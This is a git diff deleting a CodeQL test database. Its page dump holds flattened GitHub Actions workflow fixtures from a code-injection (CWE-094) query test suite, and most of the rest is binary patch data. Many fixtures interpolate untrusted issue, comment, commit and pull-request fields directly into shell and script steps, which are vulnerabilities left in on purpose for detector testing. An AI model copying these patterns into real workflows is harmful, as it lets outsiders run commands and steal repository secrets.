z8+GJR-8-22UwhebWDh(Veq~>TI9Y3EQNUSz_w}j zFx8wGWWqVXG?xJFKf=y1&G)5k^I3P8_FLfBJD)Z&m;XFz5(U$>_Z>{Qy)eB)x8Gi9 zn8|Vk*9BBxVs0HaMZFTH_vZJ-W2>IS)MvGgUoW=8)Mrj-zQsG3YH&IGOXL$w&r6BE zon|jgb6NG%M^ey{ci&eHx|}FX-`NVLY`LHYQ=KjyiZVvbIp$f~*6>ioa|6RJJF)oo z>wn%L#Q(+b0KWtL4)8m`?*P98{0{It!0!OR1N;u~JHYP%zXSXZ@H@co0KWtL4)8m` e?*P98{0{It!0!OR1N;u~JHYP%zXSizI`Ds=z%tSR diff --git a/db/db-yaml/default/pools/0/pageDump/page-000000000 b/db/db-yaml/default/pools/0/pageDump/page-000000000 deleted file mode 100644 index e8abb81542c7..000000000000 --- a/db/db-yaml/default/pools/0/pageDump/page-000000000 +++ /dev/null @@ -1,55 +0,0 @@ -/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/Users/pwntester/src/github.com/githubsecuritylab/Users/pwntester/src/github.com/Users/pwntester/src/Users/pwntester/Users/nametag:yaml.org,2002:strIssue Workflowontag:yaml.org,2002:boolissuestypesopenededitedtag:yaml.org,2002:seq[opened, edited]tag:yaml.org,2002:maptypes: ... edited]issues:jobsredirectIssueruns-onubuntu-latestCheck for issue transferCheck f ... ransferenvcontent_analysis_responsecontent ... esponseundefinedcontent ... definedstepsusesactions/checkout@v2uses: a ... kout@v2Remove conflicting charsRemove ... g charsISSUE_TITLE${{github.event.issue.title}}${{gith ... title}}ISSUE_T ... title}}frabert/replace-string-action@1.2frabert ... ion@1.2idremove_quotationswithpattern""\""string${{env.ISSUE_TITLE}}replace-with-"-"pattern: "\""name: R ... g charsCheck infocheck-inforunecho "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV -|name: Check info- uses: ... kout@v2runs-on ... -latestredirectIssue:name: Issue Workflow/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.ymlCIpull_requestbranchesmain- mainbranches:pull_request:changed_filesTest changed-filesactions/checkout@v4fetch-depth0tag:yaml.org,2002:intfetch-depth: 0uses: a ... kout@v4Get changed fileschanged-filestj-actions/changed-files@v40tj-acti ... les@v40name: G ... d filesList all changed filesList al ... d filesfor file in ${{ steps.changed-files.outputs.all_changed_files }}; do - echo "$file was changed" -done -name: L ... d files- uses: ... kout@v4changed_files:name: CI/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.ymlissue_commentecho-chamberecho '${{ github.event.comment.body }}' -run: |- run: |echo-chamber2echo '${{ github.event.comment.body }}'echo '$ ... ody }}'run: ec ... ody }}'echo '${{ github.event.issue.body }}'echo '${{ github.event.issue.title }}'echo '$ ... tle }}'run: ec ... tle }}'- run: ... ody }}'echo-chamber3actions/github-script@v3actions ... ript@v3scriptconsole.log('${{ github.event.comment.body }}')console ... dy }}')script: ... dy }}')uses: a ... ript@v3console.log('${{ github.event.issue.body }}')console.log('${{ github.event.issue.title }}')console ... le }}')script: ... le }}')- uses: ... ript@v3echo-chamber:on: issue_comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml[opened,edited]permissions{}ISSUE_BODY${{github.event.issue.body}}${{gith ... .body}}outputsresult${{env.content_analysis_response}}${{env. ... ponse}}result: ... ponse}}Check Issue Titleactions-ecosystem/action-regex-match@v2actions ... atch@v2regex-matchtextregex^[A-Za-z0-9 _.]*$'^[A-Za-z0-9 _.]*$'flagsgtext: $ ... title}}name: C ... e TitleExit Jobif${{ steps.regex-match.outputs.match == '' }}${{ ste ... = '' }}echo "Bad Issue Title Format" -exit 1 -name: Exit Jobfrabert/replace-string-action@v2.5frabert ... on@v2.5'-'Check InformationISSUE_TITLE_PARSED${{steps.remove_quotations.outputs.replaced}}${{step ... laced}}ISSUE_T ... laced}}echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENV -name: C ... rmationLabel issueenv.content_analysis_response != 'Valid'env.con ... 'Valid'curl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labels -name: Label issuename: C ... ransfercheckIssueInformationcheckIs ... rmationneeds.redirectIssue.outputs.result == 'Valid'needs.r ... 'Valid'Check for missing informationCheck f ... rmationneedsanalysis_responsegreetings_commentThank you for submitting the issue to us. We are sorry to see you get stuck with your workflow. While waiting for our team member to respond, please feel free to browse our forum at https://forum.dynamobim.com/ for more Dynamo related information."Thank ... orry tocomment_introHello ${{ github.actor }}, thank you for submitting this issue! We are super excited that you want to help us make Dynamo all that it can be."Hello ... issue! needs_more_info_commentneeds_m ... commentHowever, we need some more information in order for the Dynamo team to investigate any further.\n\n"Howeve ... Dynamoclose_issue_commentHowever, given that there has been no additional information added, this issue will be closed for now. Please reopen and provide additional information if you wish the Dynamo team to investigate further.\n\n"Howeve ... added, info_neededAdditional information:\n - Filling in of the provided Template (What did you do, What did you expect to see, What did you see instead, What packages or external references (if any) were used)\n - Attaching the Stack Trace (Error message that shows up when Dynamo crashes - You can copy and paste this into the Github Issue)\n - Upload a .DYN file that showcases the issue in action and any additional needed files, such as Revit (Note: If you cannot share a project, you can recreate this in a quick mock-up file)\n - Upload a Screenshot of the error messages you see (Hover over the offending node and showcase said errors message in the screenshot)\n - Reproducible steps on how to create the error in question."Additi ... ion:\\nspecific_infoCan you please fill in the following to the best of your ability:"Can yo ... ility:"templateISSUE_TEMPLATE.md"ISSUE_TEMPLATE.md"issue_labelneeds more infoacceptable_missing_infoaccepta ... ng_info1analysi ... definedISSUE_B ... .body}}${{env.ISSUE_BODY}}${{ steps.remove_quotations.outputs.replaced }}${{ ste ... aced }}ISSUE_B ... aced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENV -Close issueenv.analysis_response == 'Empty'env.ana ... 'Empty'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments -curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }} -name: Close issueLabel and comment issueLabel a ... t issue((env.analysis_response != 'Valid') && (env.analysis_response != 'Empty') && (github.event.action == 'opened'))((env.a ... ened'))curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labels -curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments -name: L ... t issueUnlabel updated issueUnlabel ... d issueenv.analysis_response == 'Valid' && github.event.action == 'edited'env.ana ... edited'echo urldecode ${{env.issue_label}} -curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g') -name: U ... d issueGreetingsenv.analysis_response == 'Valid' && github.event.action == 'opened'env.ana ... opened'curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/comments -name: Greetingsif: nee ... 'Valid'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.ymlIssue Type Predicterissue_type_Predicterparsed_issue_bodyissue_json_stringis_wish_listCheckout Dynamo Reponame: C ... mo RepoRemove Quotesremove_quotes${{ github.event.issue.body }}${{ git ... body }}ISSUE_B ... body }}${{ env.ISSUE_BODY }}${{ env ... BODY }}name: Remove QuotesAnalyze Issue Body${{ steps.remove_quotes.outputs.replaced }}echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENV -name: A ... ue BodyClean Issue Bodyenv.analysis_response == 'Valid'env.ana ... 'Valid'ISSUE_BODY_PARSEDecho "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENV -name: C ... ue BodyCreate Issue JSON StringCreate ... StringISSUE_NUMBER${{ github.event.issue.number }}${{ git ... mber }}${{ github.event.issue.title }}${{ git ... itle }}ISSUE_N ... mber }}echo "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENV -name: C ... StringCheckout IssuesTypePredicter RepoCheckou ... er ReporepositoryDynamoDS/IssuesTypePredicterDynamoD ... edicterpathIssuesTypePredicterreposit ... edictername: C ... er RepoSetup dotnetactions/setup-dotnet@v4actions ... tnet@v4dotnet-version3.1.0'3.1.0'dotnet- ... '3.1.0'name: Setup dotnetBuild Issues Type PredicterBuild I ... edicterdotnet build ./IssuesTypePredicter/IssuesTypePredicter.sln --configuration Release -cp ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/bin/Release/netcoreapp3.1/MLModel.zip . -name: B ... edicterRun Issues Type PredicterRun Iss ... edicterecho "is_wish_list="$(dotnet run -p ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/IssuesTypePredicterML.ConsoleApp.csproj -v q "${{ env.issue_json_string }}")"" >> $GITHUB_ENV -name: R ... edicterLabel issue as 'Wishlist'Label i ... shlist'env.analysis_response == 'Valid' && contains(env.is_wish_list, 'IsWishlist:1')env.ana ... ist:1')GH_TOKEN${{ secrets.DYNAMO_ISSUES_TOKEN }}${{ sec ... OKEN }}GH_TOKE ... OKEN }}gh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }} -name: L ... shlist'Label issue as 'NotMLEvaluated'Label i ... luated'env.analysis_response != 'Valid' || env.issue_json_string == ''env.ana ... g == ''gh issue edit ${{ github.event.issue.number }} --add-label "NotMLEvaluated" --repo ${{ github.repository }} -name: L ... luated'- name: ... mo Reponame: I ... edicterissue_t ... dicter:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.ymlCherry pickingpushmaster- masterpush:cherry_pickdestination_branchinvalid'invalid'auto_branchauto-${{github.event.after}}'auto-$ ... fter}}'user_nameDynamo-Bot"Dynamo-Bot"destina ... nvalid'checkoutactions/checkout@v3name: checkoutfrabert/replace-string-action@v1.2frabert ... on@v1.2${{github.event.commits[0].message}}${{gith ... ssage}}ISSUE_B ... laced}}echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV -env.destination_branch != 'invalid'env.des ... nvalid'Create PR to branchgit config user.name "${{env.user_name}}" -git fetch --all -git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} -git cherry-pick -x ${{github.event.after}} --strategy-option theirs -git push -u origin ${{env.auto_branch}} -hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" -GITHUB_TOKEN${{secrets.DYNAMOBOTTOKEN}}${{secr ... TOKEN}}pr_messageCherry-Pick from commit: ${{github.event.after}} - -### Cherry-picking: -[Commit](https://github.com/DynamoDS/Dynamo/commit/${{github.event.after}}) - -### Pull request: -${{ env.ISSUE_BODY_PARSED }} -GITHUB_ ... TOKEN}}if: env ... nvalid'- name: checkoutcherry_pick:name: Cherry picking/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.ymldiscussionecho '${{ github.event.discussion.title }}'echo '${{ github.event.discussion.body }}'- run: ... tle }}'on: discussion/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.ymldiscussion_commenton: dis ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.ymlgollumecho '${{ github.event.pages[1].title }}'echo '${{ github.event.pages[11].title }}'echo '${{ github.event.pages[0].page_name }}'echo '$ ... ame }}'run: ec ... ame }}'echo '${{ github.event.pages[2222].page_name }}'echo '${{ toJSON(github.event.pages.*.title) }}'echo '$ ... le) }}'run: ec ... # safeon: gollum/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.ymlImage URL Processingcreated[created]types: [created]issue_comment:process-image-urlcontains(github.event.comment.body, 'https://github.com/github/release-assets/assets/')contain ... sets/')Checkoutname: CheckoutExtract and Clean Initial URLExtract ... ial URLextract-urlBODY${{ github.event.comment.body }}BODY: $ ... body }}echo "::set-output name=initial_url::$BODY" -name: E ... ial URLGet Redirected URL with DebuggingGet Red ... buggingcurlINITIAL_URL${{ steps.extract-url.outputs.initial_url }}${{ ste ... _url }}INITIAL ... _url }}echo "redirected_url=$(echo $INITIAL_URL)" >> $GITHUB_OUTPUT -name: G ... buggingTrim URL after PNGtrim-urlREDIRECTED_URL${{ steps.curl.outputs.redirected_url }}REDIREC ... _url }}echo "trimmed_url=$(echo $REDIRECTED_URL)" >> "$GITHUB_OUTPUT" -name: T ... ter PNGUpdate Comment with New URLUpdate ... New URLNEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" -name: U ... New URL- name: Checkoutprocess-image-url:name: I ... cessing/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.ymljob1job_output${{ steps.step.outputs.value }}${{ ste ... alue }}job_out ... alue }}sourceRemove foo from changed filesRemove ... d filesstepmad9000/actions-find-and-replace-string@3mad9000 ... tring@3${{ steps.source.outputs.all_changed_files }}${{ ste ... iles }}findfoo'foo'replace''source: ... iles }}name: R ... d filesjob2${{ always() }}sinkecho ${{needs.job1.outputs.job_output}}echo ${ ... utput}}id: sink- id: sinkjob1:on: push/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yamlglobal_envtestglobal_ ... itle }}job_envjob_env ... itle }}echo '${{ env.global_env }}'echo '$ ... env }}'run: ec ... env }}'echo '${{ env.test }}'echo '$ ... est }}'run: ec ... est }}'echo '${{ env.job_env }}'echo '${{ env.step_env }}'step_envstep_en ... itle }}env:on: issues/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.ymlCodeQL Auto Language"CodeQL ... nguage"[ main ]branches: [ main ]schedulecron17 19 * * 6'17 19 * * 6'cron: '17 19 * * 6'- cron: ... * * 6'create-matrixmatrix${{ steps.set-matrix.outputs.all_changed_files }}matrix: ... iles }}set-matrix- name: ... d filesanalyze${{ needs.create-matrix.outputs.matrix != '[]' }}${{ nee ... '[]' }}Analyzeactionsreadcontentssecurity-eventswriteactions: readstrategyfail-fastfalselanguage${{ fromJSON(needs.create-matrix.outputs.matrix) }}${{ fro ... rix) }}languag ... rix) }}fail-fast: falseCheckout repositoryname: C ... ository${{ matrix.language }} -| run: | - name: ... ositoryneeds: create-matrixcreate-matrix:name: " ... nguage"/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.ymlsimple1${{ github.event.head_commit.message }}${{ git ... sage }}source: ... sage }}id: source no-stepecho "test=foo" >> "$GITHUB_OUTPUT"echo "t ... OUTPUT"id: no-stepecho "echo ${{steps.no-step.outputs.foo}}" -- id: source simple1:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.ymlfoobarfoo'foobarfoo'source: 'foobarfoo'for file in ${{ steps.step.outputs.value }}; do - echo "$file was changed" -done -/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.ymlpull_request_reviewecho '${{ github.event.pull_request.title }}'echo '${{ github.event.pull_request.body }}'echo '${{ github.event.pull_request.head.label }}'echo '$ ... bel }}'run: ec ... bel }}'echo '${{ github.event.pull_request.head.repo.default_branch }}'echo '$ ... nch }}'run: ec ... nch }}'echo '${{ github.event.pull_request.head.repo.description }}'echo '$ ... ion }}'run: ec ... ion }}'echo '${{ github.event.pull_request.head.repo.homepage }}'echo '$ ... age }}'run: ec ... age }}'echo '${{ github.event.pull_request.head.ref }}'echo '$ ... ref }}'run: ec ... ref }}'echo '${{ github.event.review.body }}'on: pul ... _review/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.ymlpull_request_review_commentpull_re ... commenton: pul ... comment/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.ymlpull_request_targetrun: ec ... definedecho '${{ github.head_ref }}'- run: ... definedon: pul ... _target/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.ymlecho '${{ github.event.commits[11].message }}'echo '${{ github.event.commits[11].author.email }}'echo '$ ... ail }}'run: ec ... ail }}'echo '${{ github.event.commits[11].author.name }}'echo '${{ github.event.head_commit.message }}'echo '${{ github.event.head_commit.author.email }}'echo '${{ github.event.head_commit.author.name }}'echo '${{ github.event.head_commit.committer.email }}'echo '${{ github.event.head_commit.committer.name }}'echo '${{ github.event.commits[11].committer.email }}'echo '${{ github.event.commits[11].committer.name }}'- run: ... age }}'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.ymlsummaryid: summaryflowecho "${{steps.summary.outputs.value}}" -id: flow no-flowecho "${{steps.summary.outputs.foo}}" -id: no-flow- id: summary/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml[pull_r ... equest]for file in ${{ steps.source.outputs.all_changed_files_count }}; do - echo "$file was changed" -done -/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml${{ steps.step2.outputs.test }}${{ ste ... test }}job_out ... test }}step0id: step0 step1${{ steps.step0.outputs.value}}${{ ste ... value}}BODY: $ ... value}}shellpowershellWrite-Output "::set-output name=MSG::$ENV{BODY}" -id: step1step2MSG${{steps.step1.outputs.MSG}}${{step ... s.MSG}}MSG: ${ ... s.MSG}}echo "test=$MSG" >> "$GITHUB_OUTPUT"id: step2run: ec ... utput}}- run: ... utput}}/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.ymlworkflow_runworkflows[test]workflows: [test]workflow_run:echo '${{ github.event.workflow_run.display_title }}'echo '${{ github.event.workflow_run.head_commit.message }}'echo '${{ github.event.workflow_run.head_commit.author.email }}'echo '${{ github.event.workflow_run.head_commit.author.name }}'echo '${{ github.event.workflow_run.head_commit.committer.email }}'echo '${{ github.event.workflow_run.head_commit.committer.name }}'echo '${{ github.event.workflow_run.head_branch }}'echo '${{ github.event.workflow_run.head_repository.description }}'on:/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1'test'descriptionbrandingiconcoloricon: 'test'inputsrequireddefaultdescription: testtest:runsusingcomposite"composite"using: "composite"name: 'test'/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2Hello World'Hello World'Greet someone and record the time'Greet ... e time'who-to-greetWho to greet'Who to greet'trueWorld'World'descrip ... greet'who-to- ... f inputtimeThe time we greeted you'The ti ... ed you'descrip ... ed you'time: # id of outputdocker'docker'imageDockerfile'Dockerfile'args${{ inputs.who-to-greet }}${{ inp ... reet }}- ${{ i ... reet }}using: 'docker'name: 'Hello World'hSt¹>w \ No newline at end of file diff --git a/db/db-yaml/default/pools/1/buckets/info b/db/db-yaml/default/pools/1/buckets/info deleted file mode 100644 index 0111728636533e2c31d7b0489e64f46bcd4d6cf2..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q diff --git a/db/db-yaml/default/pools/1/buckets/page-000000 b/db/db-yaml/default/pools/1/buckets/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/db/db-yaml/default/pools/1/ids1/info b/db/db-yaml/default/pools/1/ids1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/db/db-yaml/default/pools/1/indices1/info b/db/db-yaml/default/pools/1/indices1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/db/db-yaml/default/pools/1/info b/db/db-yaml/default/pools/1/info deleted file mode 100644 index 9b4ec24220f77cd70a002420d93e390bfc4c1f7a..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 41 ccmZQz00U+q$+QN785kjAU>eL`E;&&F04bXS)Bpeg diff --git a/db/db-yaml/default/pools/1/metadata/info b/db/db-yaml/default/pools/1/metadata/info deleted file mode 100644 index 9cdb710dfd9490f67f5103cbab69eb12829f96b4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 diff --git a/db/db-yaml/default/pools/1/metadata/page-000000 b/db/db-yaml/default/pools/1/metadata/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/db/db-yaml/default/pools/1/pageDump/page-000000000 b/db/db-yaml/default/pools/1/pageDump/page-000000000 deleted file mode 100644 index 7bccaeb20c898fd660036bab54ae98c20280d0a3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U 